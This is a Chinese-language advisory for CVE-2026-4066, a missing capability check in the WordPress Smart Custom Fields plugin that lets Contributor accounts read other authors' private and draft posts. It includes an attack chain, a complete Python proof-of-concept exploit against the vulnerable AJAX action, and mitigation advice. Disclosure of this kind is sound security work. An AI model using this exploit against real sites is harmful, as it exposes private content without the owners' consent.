CVE-2026-4066 WordPress Smart Custom Fields 插件信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-4066

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Smart Custom Fields

漏洞概述

WordPress Smart Custom Fields插件在5.0.6及之前版本中存在严重的信息泄露漏洞。该漏洞源于`relational_posts_search()`函数缺少必要的能力检查，导致未授权的数据访问。具有Contributor及以上权限的认证攻击者，可利用`smart-cf-relational-posts-search` AJAX操作，绕过权限验证读取其他作者的私有和草稿帖子内容。该函数仅检查通用的`edit_posts`能力，而未验证用户对特定文章的读取权限，从而造成敏感数据泄露。

技术细节

该漏洞位于WordPress Smart Custom Fields插件的`class.field-related-posts.php`文件中，核心问题在于`relational_posts_search()`函数的权限验证逻辑存在缺陷。该函数被注册为AJAX处理程序（对应action为`smart-cf-relational-posts-search`），旨在通过搜索查找关联文章。

当此函数被调用时，它直接执行数据库查询，使用了`post_status=any`参数。这意味着查询结果不仅包含已发布的文章，还涵盖了私有和草稿状态的文章。随后，函数将完整的`WP_Post`对象返回给前端，对象中包含了`post_content`等敏感字段。

关键的安全缺失在于，代码仅检查了当前用户是否具备`edit_posts`这一通用能力。在WordPress角色系统中，Contributor（投稿者）及以上角色通常拥有此权限，但这并不代表他们有权阅读*所有*文章，尤其是属于其他作者的私有草稿。由于代码缺乏对具体文章`read_post`能力的二次验证，攻击者只需具备Contributor权限，即可通过构造恶意的AJAX请求，批量检索并窃取站点内所有用户的私有和草稿文章内容，导致严重的信息泄露。

攻击链分析

STEP 1

步骤1: 获取低权限账户

攻击者注册或获取一个具有Contributor（投稿者）及以上权限的WordPress账户。

STEP 2

步骤2: 发起AJAX请求

攻击者向`/wp-admin/admin-ajax.php`发送POST请求，参数包含`action=smart-cf-relational-posts-search`。

STEP 3

步骤3: 触发漏洞查询

服务器端插件接收请求，调用`relational_posts_search()`函数。由于缺少权限检查，该函数查询数据库时使用`post_status=any`。

STEP 4

步骤4: 获取敏感数据

函数将包含私有和草稿文章内容的完整对象返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"
username = "contributor_user"
password = "password123"

def exploit():
    # Create a session to handle cookies
    session = requests.Session()
    
    # 1. Authenticate as a low-privileged user (Contributor)
    login_url = "http://target-wordpress-site.com/wp-login.php"
    login_payload = {
        "log": username,
        "pwd": password,
        "redirect_to": "http://target-wordpress-site.com/wp-admin/",
        "wp-submit": "Log In",
        "testcookie": "1"
    }
    
    print("[*] Attempting to login as {}...".format(username))
    login_response = session.post(login_url, data=login_payload)
    
    if login_response.status_code != 200:
        print("[-] Login failed.")
        return

    print("[+] Login successful.")
    
    # 2. Send exploit payload to vulnerable AJAX action
    # The action 'smart-cf-relational-posts-search' is vulnerable
    exploit_payload = {
        "action": "smart-cf-relational-posts-search",
        "q": "", # Empty query to potentially retrieve broad results or recent posts
        "post_type": "post"
    }
    
    print("[*] Sending exploit payload to {}...".format(target_url))
    response = session.post(target_url, data=exploit_payload)
    
    # 3. Check for sensitive data in response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[*] Response content:")
        print(response.text)
        # Check if response contains typical WordPress post structure
        if "post_content" in response.text or "post_title" in response.text:
            print("[!] Potential sensitive data found in response.")
    else:
        print("[-] Exploit request failed.")

if __name__ == "__main__":
    exploit()

影响范围

Smart Custom Fields <= 5.0.6

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Smart Custom Fields插件以阻断攻击链。同时，管理员应严格限制用户注册，仅向信任的用户分配Contributor或更高权限，并定期审计站点内容以发现潜在的数据泄露痕迹。